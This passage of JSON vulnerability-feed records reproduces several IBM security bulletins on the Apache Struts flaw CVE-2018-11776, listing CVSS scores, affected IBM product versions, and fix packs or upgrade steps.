"https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 & 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . 
-name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS 
Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . 
-name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-01T18:12:50", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. 
The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 
Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by 
another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its 
upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 
007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 
003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 
00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. 
\n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 & 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:41", "description": "## Summary\n\nApache Tomcat, Open SSL, and Apache Tomcat have multiple security vulnerabilities that could allow a remote attacker to exploit the Rational Build Forge application. Respective security vulnerabilities are discussed in detail in the subsequent sections.\n\n## Vulnerability Details\n\nThis section includes the vulnerability details that affects the Rational Build Forge.\n\n**CVEID:** 